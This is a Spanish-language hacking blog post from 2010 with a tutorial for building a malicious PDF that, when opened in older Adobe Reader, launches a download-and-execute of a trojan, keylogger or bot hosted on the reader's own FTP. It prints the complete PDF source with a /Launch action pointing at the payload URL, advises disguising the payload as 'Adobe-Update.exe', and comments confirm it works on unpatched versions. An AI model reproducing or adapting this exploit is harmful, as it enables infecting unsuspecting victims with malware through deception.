18 jun. 2010

Ejecutar *.exe al abrir un PDF

Bueno.. me descargué un video donde explicaban el método y decidí escribir un pequeño tutorial de como hacer que al abrir un PDF se descargué y ejecute un *.exe.

Necesitamos:
  1. Nuestro *.exe (troyano, keylogger, bot, joke, etc...)
  2. Un FTP.
Dos simples cosas... Bueno, una vez definido el *.exe que vamos a usar, lo vamos a subir a un FTP, puede ser cualquiera que te deje subir archivos y descargarlos directamente con el formato ftp.miftp/server_troyano.exe también sirve algún uploader que deje la url en el mismo formato y que sea directo (sin captcha y sin retraso), en este caso no sirve ni megaupload, ni rapidshare, etc...

Si no encuentran buenos FTP, dense una vuelta por http://www.free-webhosts.com/webhosting-01.php.

Empecemos:

Bueno... ahora manos a la obra...

Inicio --> ejecutar --> notepad.exe

Pegan este código:
%PDF-1.1

1 0 obj
<<
 /Type /Catalog
 /Outlines 2 0 R
 /Pages 3 0 R
 /OpenAction 8 0 R
>>
endobj

2 0 obj
<<
 /Type /Outlines
 /Count 0
>>
endobj

3 0 obj
<<
 /Type /Pages
 /Kids [4 0 R]
 /Count 1
>>
endobj

4 0 obj
<<
 /Type /Page
 /Parent 3 0 R
 /MediaBox [0 0 612 792]
 /Contents 5 0 R
 /Resources 
 << /ProcSet 6 0 R
    /Font << /F1 7 0 R >>
 >>
>>
endobj

5 0 obj
<< /Length 46 >>
stream
BT
/F1 24 Tf
100 700 Td
(Hacking[Blackploit]--> Blackploit.blogspot.com)Tj
ET
endstream
endobj

6 0 obj
[/PDF /Text]
endobj

7 0 obj
<<
 /Type /Font
 /Subtype /Type1
 /Name /F1
 /BaseFont /Helvetica
 /Encoding /MacRomanEncoding
>>
endobj

8 0 obj
<<
 /Type /Action
 /S /Launch
 /Win
 <<
  /F (http://www.FTP-gratuito.com/server_troyano.exe)
 >>
>>
endobj

xref
0 9
0000000000 65535 f
0000000012 00000 n
0000000109 00000 n
0000000165 00000 n
0000000234 00000 n
0000000401 00000 n
0000000505 00000 n
0000000662 00000 n
trailer
<<
 /Size 9
 /Root 1 0 R
>>
startxref
751
%%EOF

Aquí lo único que tiene que modificar es:
  /F (http://www.FTP-gratuito.com/server_troyano.exe)
En http://www.FTP-gratuito.com/server_troyano.exe ponen el link de su *.exe previamente subido a un FTP.

Si quieren también pueden modificar esto:
(Hacking[Blackploit]--> Blackploit.blogspot.com)Tj
En Hacking[Blackploit]--> Blackploit.blogspot.com va el texto que aparecerá en el pdf cuando se abra.

Ya modificado todo, guardan el documento como exploit.pdf o como quieran, lo importante es que termine en *.pdf

Resultado:

Al abrir el pdf nos salta una ventana pidiendo que ejecutemos un *.exe.
Recomendanción: que su *.exe se llame Adobe-Update.exe.
Al poner abrir se ejecuta nuestro *.exe.

Para más detalles vean el video de donde saque la información: ExploitPdf.avi
Aquí el exploit: Exploit.pdf

Fuente: http://indetectables.net/

[+] Salu2
[+] ZioneR

Author & Editor

Ingeniero Civil en Computación (Universidad de Chile FCFM) y Diplomado en Gestión y Evaluación de Proyectos TI (Universidad de Chile FEN). Actualmente trabajo como Project Manager en varios proyectos y como asesor tecnológico para empresas.

5 Notaciones:

  1. muy bueno..
    funciona... :D

    ResponderEliminar
  2. lo voy a probrar promete..XD

    ResponderEliminar
  3. Viejo... la falla ya fue parchada en la version 9.3.3, para versiones pasadas de adobe funciona el exploit.

    [+] Salu2

    ResponderEliminar
  4. me gusta el articulo y la pagina muy bueno!!

    ResponderEliminar

Nota: solo los miembros de este blog pueden publicar comentarios.

Labels

0-day (12) 1337day (1) 8.8 (2) Adobe Acrobat (1) Android (2) Anonimato (1) Anonymous (9) BackDoor (2) BackTrack (15) badUSB (1) Base64 (1) Black Hat (5) BlackHat (1) Blackploit (25) Brute Force (3) Bug (106) Bypass Password (1) Bypass Redirect (1) C99 Shell (1) Carding (1) CheatSheet (15) Chilean Way (1) Conference (9) Cryptsetup (1) DDoS (11) DEF CON (3) DEFCON (6) Diapositivas (1) Diseño Web (1) Distro Linux (27) Documental (2) DoS (2) Drupal (1) DuckDuckGo (1) E-zine (18) Ekoparty (1) Escaneo (4) España (1) Exploit (64) Facebook (1) Fast-Info (44) FBI (1) Ficheros Binarios (1) Firefox (4) Flash (2) Forense (9) Fuerza Bruta (11) Fuga de Datos (1) GhostShell (1) GNU/Linux (4) Google (2) Guía (1) Hack T00LZ (130) Hack Tips (63) Hacked (6) Hacking (18) Hacking Hardware (5) HashCat (1) Herramientas (121) HighSecCON (1) Humor Geek (13) Infografía (1) Ingeniería Social (5) Inj3ct0r (1) Internet Explorer (3) Java (7) JavaScript (2) Kali (3) KitPloit (1) Leaks (21) Linux OS (79) LulzSec (1) Mac OS (10) Magazine (1) Malaware (3) Malaware Tools (12) Malware (1) Man in the Middle (15) Manuales (3) MD5 CRACK (4) Metasploit (57) MSSQL (1) MySQL (6) MySQL CRACK (1) Nmap (6) Nmap NSE (2) Noticias (193) NTLM CRACK (1) Ofuscar (5) OpenSolaris OS (1) OpenSSL (1) ORACLE (1) OWASP (3) Paper (9) PDF (6) PenTest (14) Perl (2) Phearking (13) Phishing (3) PHP (13) phpMyAdmin (1) PoC (1) Premios Bitacoras (1) Presentaciones (9) PRISM (1) Privacidad (2) Programación (12) Programas Linux (41) Programas Windows (41) Pwned (1) Python (4) Reconocimiento (5) Ruby (2) s (1) Scripts (7) Seguridad (144) Seguridad Web (139) Seguridad Wireless (19) Sensitive Data Exposure (2) SHA1 CRACK (1) Shellshock (1) Slides (1) Spoofing (1) Spyware (1) SQLi (19) SQLi Tools (7) SQLMap (2) SSH (1) Textos (73) Tips (57) Troyanos y Virus (11) Trucos (7) Trucos Win (7) Turiales (56) Tutoriales (18) Twitter (1) Ubuntu (2) Unlock (1) URL Redirection (1) UXSS (1) vBulletin (1) Video (47) Virtualización (2) Web T00LZ (17) Wifislax (1) Wikileaks (1) WikiRebels (1) Windows OS (66) Wireless Tools (13) XSS (15) Youtube (1)

 
biz.